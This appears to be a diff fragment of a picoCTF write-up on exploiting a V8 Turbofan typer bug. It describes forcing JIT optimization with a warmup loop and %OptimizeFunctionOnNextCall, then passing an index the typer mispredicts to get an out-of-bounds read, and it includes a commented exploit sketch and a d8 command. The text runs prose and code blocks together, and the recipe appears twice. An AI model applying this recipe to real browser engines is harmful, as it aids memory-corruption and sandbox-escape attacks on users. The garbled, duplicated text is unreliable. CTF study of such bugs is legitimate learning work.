Description

 See real-world bug patterns for adjacent JS sandbox-escape ideas.

-Trigger JIT compilation and force the bugObservationI noticed the missing guard only exists in the Turbofan-compiled path, not in the interpreter or baseline tier, which meant the exploit could only fire after the target function had been optimized; a warmup loop followed by %OptimizeFunctionOnNextCall was the standard way to force that tier-up before passing the type-confusing input.Standard recipe: write a small attack function, force optimization via repeated calls (or %OptimizeFunctionOnNextCall in d8 with --allow-natives-syntax), then call once with an input the typer mispredicts.bash# Run d8 with native syntax to force optimization: ./d8 --allow-natives-syntax exploit.jsbash# Sketch of a typer-confusion exploit (specifics depend on the diff): # function leak(x) { return arr[x]; } # for (let i = 0; i < 0x10000; i++) leak(0); # %OptimizeFunctionOnNextCall(leak); # leak(badValue); // typer thinks in-range, runtime is out-of-range -> OOB readExpected output
+ObservationThe missing guard exists only on the Turbofan-compiled path, not in the interpreter or the baseline tier, so the exploit fires only once the target function is optimized.
+A warmup loop followed by %OptimizeFunctionOnNextCall forces that tier-up before the type-confusing input arrives.Standard recipe: write a small attack function, force optimization via repeated calls (or %OptimizeFunctionOnNextCall in d8 with --allow-natives-syntax), then call once with an input the typer mispredicts.bash# Run d8 with native syntax to force optimization: ./d8 --allow-natives-syntax exploit.jsbash# Sketch of a typer-confusion exploit (specifics depend on the diff): # function leak(x) { return arr[x]; } # for (let i = 0; i < 0x10000; i++) leak(0); # %OptimizeFunctionOnNextCall(leak); # leak(badValue); // typer thinks in-range, runtime is out-of-range -> OOB readExpected output

 picoCTF{...}What didn't work first